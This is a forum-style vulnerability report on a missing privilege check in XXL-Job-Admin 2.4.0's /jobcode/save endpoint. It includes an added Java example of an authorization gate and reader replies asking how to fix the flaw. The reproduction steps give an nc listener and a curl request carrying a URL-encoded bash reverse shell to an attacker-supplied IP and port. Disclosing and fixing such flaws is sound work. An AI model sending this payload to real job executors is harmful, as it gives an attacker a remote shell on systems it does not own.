Remote Code Execution in /xxl-job-admin/jobcode/save

lrpiutwd  posted 4 months ago in  Other
Follow (0) | Answers (4) | Views (245)

Environment

MySQL 5.7.44, XXL-Job-Admin 2.4.0
Virtual Machine 1: Ubuntu 22.04.3 (as XXL-Job-Admin)
Virtual Machine 2: Ubuntu 22.04.3 (as XXL-Job-Executor)

Vulnerability Information

It was found that the /xxl-job-admin/jobcode/save endpoint does not validate user privileges. Modifying the code of a running cron job for the job executor does not require privileged user access. By leveraging the vulnerability, users could craft HTTP requests to modify and run arbitrary code (e.g., sensitive information disclosure or a reverse shell) on the job executor.

Steps to reproduce the behavior

Step 1: Create a listener
nc -nlvp 8888

Step 2: Create an unprivileged user and get its cookie

Step 3: Craft an HTTP request for job code saving. This demonstration will be a reverse shell payload.
curl http://<IP Address>:<Port>/xxl-job-admin/jobcode/save --cookie "xxljob_adminlte_settings=on; XXL_JOB_LOGIN_IDENTITY=<Unprivileged Cookie>" -d "id=2&glueSource=%23%2Fbin%2Fbash%0Abash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F<Reverse shell IP>%2F<Reverse shell port>%200%3E%261&glueRemark=Test"

Step 4: Trigger the cron job or wait until it executes. A reverse shell will be executed.
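The report above comes down to a state-changing handler that writes job code without first checking who is calling it. The following is an added example, not code from the XXL-Job project, that models the missing control: an explicit authorization gate in front of the "save glue source" operation, evaluated before anything is written. All class and field names (LoginUser, JobInfo, allowedJobGroups, saveGlue) are hypothetical stand-ins chosen for the example; the rule it encodes (admins may edit any job, other users only jobs in executor groups they hold) is an assumption about what a reasonable policy looks like, not a description of the project's own code.

```java
// Added example (hypothetical names, not XXL-Job project code): an authorization
// gate that runs before a "save job code" operation can change any state.
import java.util.Set;

public class GlueSaveAuthorization {

    /** Hypothetical stand-in for the logged-in identity (assumed fields). */
    record LoginUser(String username, boolean admin, Set<Integer> allowedJobGroups) {}

    /** Hypothetical stand-in for a stored job; only the fields this check needs. */
    record JobInfo(int id, int jobGroup, String glueSource) {}

    /** Raised when the caller is not allowed to modify the job's code. */
    static class PermissionDeniedException extends RuntimeException {
        PermissionDeniedException(String msg) { super(msg); }
    }

    /**
     * Authorization rule (assumed policy): administrators may edit any job; other
     * users may edit only jobs in executor groups they have been granted.
     */
    static boolean mayEditJob(LoginUser user, JobInfo job) {
        if (user == null) return false;            // no session at all: deny
        if (user.admin()) return true;
        return user.allowedJobGroups().contains(job.jobGroup());
    }

    /**
     * Guarded save: the permission check happens first, so a denied caller never
     * reaches the write. Returns an updated copy so the caller can inspect the result.
     */
    static JobInfo saveGlue(LoginUser user, JobInfo job, String newGlueSource) {
        if (!mayEditJob(user, job)) {
            throw new PermissionDeniedException(
                "user " + (user == null ? "<anonymous>" : user.username())
                + " may not modify job " + job.id());
        }
        return new JobInfo(job.id(), job.jobGroup(), newGlueSource);
    }

    public static void main(String[] args) {
        // Constructed sample data: job 2 belongs to executor group 1.
        JobInfo job = new JobInfo(2, 1, "echo hello");
        LoginUser admin = new LoginUser("admin", true, Set.of());
        LoginUser limited = new LoginUser("user", false, Set.of(5)); // holds group 5 only

        // Administrator: the edit goes through.
        System.out.println("admin saved: " + saveGlue(admin, job, "echo updated").glueSource());

        // Unprivileged user without rights on group 1: rejected before anything is written.
        try {
            saveGlue(limited, job, "echo changed");
        } catch (PermissionDeniedException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The point of the structure is that the check is part of the handler itself rather than something the UI is trusted to enforce: a request built with curl and a valid low-privilege session, as in the report, hits the same gate as a request from the browser.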

68de4m5k 1#

Create an unprivileged user and get its cookie, which I don't think is easy for attackers.

abithluo 2#

Agree. The assumption of the attack is that you gained an unprivileged account.

cuxqih21 3#

So how should this vulnerability be fixed?

oogrdqng 4#

Same question: how should this vulnerability be fixed?
